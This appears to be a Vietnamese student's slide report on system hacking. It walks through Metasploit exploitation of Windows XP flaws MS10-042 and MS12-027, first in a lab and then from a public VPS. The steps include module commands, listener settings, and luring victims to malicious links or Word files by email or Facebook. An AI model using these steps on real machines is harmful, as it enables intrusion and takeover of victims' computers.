zxzx

1. BÁO CÁO THỰC TẬP
SYSTEM HACKING
GVHD: Thầy Võ Đỗ Thắng
SVTT: Trần Nguyễn Lộc

2. MỤC LỤC
Giới thiệu1
2
T
3 Tổng Kết
Thực hiện

3. Giới thiệu
• Theo thống kê của công ty Bkav, từ đầu năm 2013
đến nay, tại Việt Nam đã có 2.405 website của các
cơ quan, doanh nghiệp bị xâm nhập, trung bình
mỗi tháng có khoảng 300 website bị tấn công
• Hiện nay, các thiết bị như máy tính PC, laptop,
đều có kết nối mạng nội bộ hoặc kết nối Internet .
Trên các thiết bị này, hầu hết cài đặt các phần
mềm ứng dụng như IE, Microsoft Office, Adobe
Reader ,…. và chạy hệ điều hành như Windows
XP, Windows 7…

4. Giới thiệu system hacking
Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra
những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ
chức
Gồm những kỹ thuật lấy username, password dựa vào phần
mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều
hành Windows
Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông
tin, xóa những log file hệ thống

5. Quá trình tấn công vào một hệ thống
Enumerate (liệt kê): Trích ra tất cả những thông tin có
thể về user trong hệ thống. Sử dụng phương pháp thăm
dò SNMP để có được những thông tin hữu ích, chính
xác hơn
Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất.
Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng
nhập của user. Hoặc bằng một cách nào khác, mục tiêu
phải đạt tới là quyền truy cập vào hệ thống
Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi
giới hạn truy cập từ user binh thường lên admin hoặc
user có quyền cao hơn đủ cho chúng ta tấn công
Execute (thực thi): Thực thi ứng dụng trên hệ thống
máy đích. Chuẩn bị trước malware, keylogger,
rootkit…để chạy nó trên máy tính tấn côngHide (ẩn file): Những file thực thi, file soucecode chạy
chương trình… Cần phải được làm ẩn đi, tránh bị mục
tiêu phát hiện tiêu diệtTracks (dấu vết): Tất nhiên không phải là để lại dấu
vết. Những thông tin có liên quan đến bạn cần phải bị
xóa sạch, không để lại bất cứ thứ gì. Nếu không khả
năng bạn bị phát hiện là kẻ đột nhập là rất cao.
Tóm lại, quá trình tấn công hệ
thống (System hacking) là
bước tiếp theo sau quá trình
khảo sát, thu thập thông tin
của mục tiêu cần tấn công
bằng những kỹ thuật như
Footprinting, Social
engineering, Enumeration,
Google Hacking… đã được áp
dụng cho mục đích truy tìm
thông tin.

6. Hệ điều hành Backtrack 5 R3
- Backtrack là một bản phân phối dạng Live DVD của
Linux, được phát triển để thử nghiệm xâm nhập.
Backtrack là sự hợp nhất giữa 3 bản phân phối khác
nhau của Linux về thâm nhập thử nghiệm IWHAX,
WHOPPIX, và Auditor. Trong phiên bản hiện tại của
nó (5), Backtrack được dựa trên phiên bản phân phối
Linux Ubuntu 11.10.
- Backtrack 5 chứa một số công cụ có thể được sử dụng
trong quá trình thử nghiệm thâm nhập của chúng ta

7. Phần mềm Metasploit
• Metasploit là một dự án bảo mật máy tính cung cấp
các thông tin về vấn đề lỗ hổng bảo mật cũng như
giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống
phát hiện tấn công mạng.
• Metasploit có thể chạy trên hầu hết các hệ điều hành:
Linux, Windows, MacOS.

8. Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ,
các máy tính thường kết nối với
nhau với khoảng cách vật lý
gần như trong một phòng, một
tầng, một tòa nhà, công ty, …
Các máy tính trong mạng LAN
có thể chia sẻ tài nguyên với
nhau, mà điển hình là chia sẻ
tập tin, máy in, máy quét và
một số thiết bị khác
 .Tấn công mạng Lan

9. CHUẨN BỊ
 1 máy backtrack 5 R3 có địa chỉ IP: 172.16.0.9(máy tấn
công).
 1 máy win XP có địa chỉ IP 172.16.0.10(máy bị tấn
công).

10. Xâm nhập và khai thác
Windows XP
• Nhận dạng
Lỗ hổng này có thể cho phép thực thi mã từ xa
nếu người dùng xem một trang web thiết kế đặc
biệt bằng cách sử dụng một trình duyệt web hoặc
nhấp vào một liên kết thiết kế đặc biệt trong một
thông báo e-mail.
Khai thác lổ hổng Ms10-042

11. • Thực hiện
Xâm nhập và khai thác
Windows XP
Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole
Từ dấu nhắc sử dụng lệnh: msf > search ms10_042
Copy đường dẫn, enter gõ use “dán đường dẫn vào”
Gõ show options để thấy các options của lệnh.
msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options

12.  Dùng lệnh set srvhost, lhost, exploit
- Set srvhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3
- Set lhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3
- Lệnh exploit để bắt đầu xâm nhập trên máy nạn nhân.

13.  Sau khi thực hiện lệnh exploit , thì sẽ tạo ra 1 đường link chứa mã độc , mà
khi nạn nhân kích vào, thì lập tức sẽ nhiễm mã độc và lúc này backtrack 5
sẽ chiếm toàn quyền điều khiển trên máy bạn nhân.(việc lừa nạn nhận kích
vào mã độc tùy vào khả năng của hacker như gửi mail hoặc gửi qua
facebook …., tùy vào khả năng của mỗi người)

14.  Tới bước này là ta có thể chiếm được toàn quyền điều khiển trên máy
nạn nhân như: xem thông tin trên máy nạn nhân,thêm ,xóa ,sửa file,
thư mục ….. trên máy nạn nhân.

15.  Xem thông tin trên máy nạn nhân
 Tạo thư mục backdoor thành công.

16. Xâm nhập và khai thác
Windows XP
a) Mô tả:
Mục tiêu của việc khai thác mã lỗi này là khai thác lỗ hổng của
Microsoft office (word ) trên window.
Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền
sử dụng giống như người dùng đăng nhập vào máy tính.
Khai thác lổ hỗng ms12-027

17.  Mở giao diện console của công cụ metasploit bằng dòng lệnh msfconsole.
 Search mã lỗi ms12_027 bằng dòng lệnh :search ms12_027
 Tiến hành khai thác mã lỗi bằng dòng lệnh :
use exploit /windows/fileformat/ms12_027_mscomctl_bof.
 Xem hệ điều hành có thể khai thác bởi mã lỗi ms12_027
b) Các bước tấn công

18.  Tiến hành set filename và set lhost
-Lệnh set filename : tạo ra file word có chứa mã độc
-Lệnh set lhost : set địa chỉ IP của máy backtrack 5.

19.  Sau khi tạo được mã độc là file word , ta tiến hành sao sao chép file
word này lên máy tính nạn nhân bằng nhiều cách như email……Khi
nạn nhân mở file word bị nhiễm mã độc, thì ta có thể chiếm được toàn
quyền điều khiển trên máy nạn nhân, cụ thể là một sessions mới được
tạo ra.

20. -Xem thông tin về máy tính nạn nhân sau khi chiếm toàn quyền điều khiển.
-Và có thể thực hiện được những lệnh tấn công khác mà mình muốn.

21.  Khai thác lỗ hỗng window qua mạng
internet
a) Giới thiệu Honeypot
 Honeypot là một hệ thống tài nguyên thông tin được xây dựng với
mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không
hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp
xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là
Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là
Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực
tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc
như hình thức tấn công, công cụ tấn công hay cách thức tiến hành
thay vì bị tấn công.

22. b) Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa
qua Internet

23.  Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:
- VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại
http://metasploit.org) đóng vai trò là một Honeypot trên mạng.

24. c) Thực hiện khai thác mã lỗi
 Khi thác lỗi ms10_042 trong windows xp
-Mục đích của việc khai thác mã lỗi này là khai thác lỗi css trong help center
của IE, sau khi khai thác thành công , ta có thể chiếm toàn quyền điều khiển
trên máy nạn nhân.
-Các bước tiến hành như sau:
• Khởi động chương trình metasploit trên máy chủ vps .

26. • Dùng lệnh search mã lỗi: để xem mã lỗi có toàn tại để khai thác
hay không: Ở đây search 10_042

27.  Dùng lệnh set srvhost ,lhost , exploit
 Dùng lệnh srvhost 14.0.21.113 : để set địa chỉ ip của máy vps.
 Dùng lệnh lhost 14.0.21.113 : để set địa chỉ ip của máy vps.
 Dùng lệnh Exploit để thực thi mã đã cài đặt, lúc này 1 đường link chứa mã độc
sẽ được tạo ra , và khi nạn nhân kích vào đường link này thì bị nhiễm mã độc và
ta có thể chiếm toàn quyền điều khiển trên máy nạn nhân.

28. • Đến đây ta chiếm được toàn quyền điều khiển trên máy nạn nhân
Xem thông tin trên máy nạn nhân

29. Tạo thư mục có tên là thư mục mới

30. TỔNG KẾT
• Mật khẩu phải được đặt nhiều hơn 8 ký tự và
phải là tổng hợp giữa chữ hoa, chữ thường, số
và ký tự đặc biệt để các chương trình khó dò ra
• Không mở tập tin đính kèm thư điện tử có
nguồn gốc không rõ ràng hoặc không tin cậy
• Chắc chắn rằng bạn có và đã bật hệ thống
tường lửa cho hệ thống của mình.